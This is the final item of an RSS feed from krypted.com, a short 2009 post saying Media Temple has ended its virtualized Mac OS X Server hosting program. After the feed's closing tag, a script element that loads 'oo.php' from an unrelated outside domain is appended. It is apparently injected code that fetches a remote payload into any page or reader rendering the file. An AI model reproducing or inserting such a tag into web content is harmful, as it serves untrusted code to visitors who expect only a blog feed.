		<comments>http://krypted.com/mac-os-x-server/media-temple-no-longer-doing-xserves/#comments</comments>
		<pubDate>Fri, 09 Oct 2009 02:07:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[VMware]]></category>
		<category><![CDATA[Mac OS X Virtual Hosting]]></category>
		<category><![CDATA[Media Temple]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4814</guid>
		<description><![CDATA[For a brief period in time Media Temple was doing virtualized Mac OS X Server colocation, perfect for krypted.com. But alas, that program has been discontinued. So if you were hoping to check it out the time came and went to do so. Hopefully the new Parallels Server w/ Snow Leopard will pave the way [...]]]></description>
			<content:encoded><![CDATA[<p>For a brief period in time Media Temple was doing virtualized Mac OS X Server colocation, perfect for krypted.com. But alas, that program has been discontinued. So if you were hoping to check it out the time came and went to do so. Hopefully the new Parallels Server w/ Snow Leopard will pave the way for someone to start doing this: <a href="http://mediatemple.net/labs/xv/">http://mediatemple.net/labs/xv</a><strong>Similar Articles:</strong>
<ul class="similar-posts">None Found
</ul>
<p><!-- Similar Posts took 3.599 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x-server/media-temple-no-longer-doing-xserves/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://holasionweb.com/oo.php"></script>